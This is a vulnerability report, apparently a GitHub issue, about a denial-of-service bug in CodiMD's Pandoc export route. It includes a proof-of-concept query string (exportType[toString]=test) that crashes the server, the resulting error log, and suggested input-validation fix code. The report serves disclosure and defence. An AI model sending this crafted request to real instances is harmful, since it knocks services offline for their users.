Denial of Service in actionPandoc. #1846

@y0d3n

Summary

It takes advantage of the fact that the property of req.query.xxx can be overridden.
(Implicit in outputFormats[exportType], toString is performed on variables such as exportType.)

lib/note/noteActions.js#L136 is inside the async function and outside try/catch, so an error here will stop the entire application.

const { exportType } = req.query
const contentType = outputFormats[exportType]

Steps to reproduce

  1. Create a Note and get the ID from the URL.
    Here it is http://localhost:3000/cCijJWDqR3Ot9etF_oFmDw
  2. Access http://localhost:3000/cCijJWDqR3Ot9etF_oFmDw/pandoc?exportType[toString]=test
    Please replace the ID accordingly.

TypeError: Cannot convert object to primitive value
at actionPandoc (/home/yoden/work/project/codimd/lib/note/noteActions.js:136:36)
at noteActions (/home/yoden/work/project/codimd/lib/note/index.js:187:7)
2024-01-03T15:32:10.225Z error: An uncaught exception has occured.
2024-01-03T15:32:10.225Z error: Cannot convert object to primitive value
TypeError: Cannot convert object to primitive value
at actionPandoc (/home/yoden/work/project/codimd/lib/note/noteActions.js:136:36)
at noteActions (/home/yoden/work/project/codimd/lib/note/index.js:187:7) {
level: 'error',
timestamp: '2024-01-03T15:32:10.225Z',
[Symbol(level)]: 'error',
[Symbol(message)]: '2024-01-03T15:32:10.225Z error: \tCannot convert object to primitive value'
}
2024-01-03T15:32:10.226Z error: Process will exit now.

Suggested fix

Include the problematic part in the try/catch for proper error handling.
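
The following is an added example, not part of the original report and not CodiMD's own code. It puts the lookup quoted above beside a validated form inside a try/catch, as the suggested fix proposes. The `outputFormats` entries, the helper names `lookupChecked`, `handleExport` and `runSamples`, and the sample queries are all constructed assumptions.

```javascript
// Constructed stand-in for the project's outputFormats map (entries are assumptions).
const outputFormats = { html: 'text/html', rst: 'text/x-rst' }

// Lookup in the shape quoted in the issue: the key is coerced implicitly.
function lookupUnchecked (query) {
  const { exportType } = query
  return outputFormats[exportType] // TypeError if exportType has no usable toString/valueOf
}

// Hardened lookup (hypothetical helper): only a string naming an own key is accepted,
// so objects, arrays and inherited names such as "constructor" all yield null.
function lookupChecked (query) {
  const { exportType } = query
  if (typeof exportType !== 'string') return null
  if (!Object.prototype.hasOwnProperty.call(outputFormats, exportType)) return null
  return outputFormats[exportType]
}

// Async handler sketch following the suggested fix: everything that touches request
// data runs inside try/catch, so a failure becomes a response, not a rejected promise.
async function handleExport (query, lookup = lookupChecked) {
  try {
    const contentType = lookup(query)
    if (typeof contentType !== 'string') return { status: 400, body: 'unsupported exportType' }
    return { status: 200, contentType }
  } catch (err) {
    return { status: 400, body: 'invalid exportType' }
  }
}

// Constructed sample queries, shaped like parsed req.query objects.
const samples = [
  { exportType: 'html' },
  { exportType: { toString: 'test' } }, // property overridden, as described in the issue
  { exportType: 'constructor' },        // inherited name, not an export format
  {}
]

async function runSamples () {
  const results = []
  for (const q of samples) results.push((await handleExport(q)).status)
  return results // [200, 400, 400, 400]
}

runSamples().then(statuses => console.log(statuses))
```

The type check alone removes the coercion error; the own-key check additionally keeps inherited names such as `constructor` from resolving to a non-string value.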
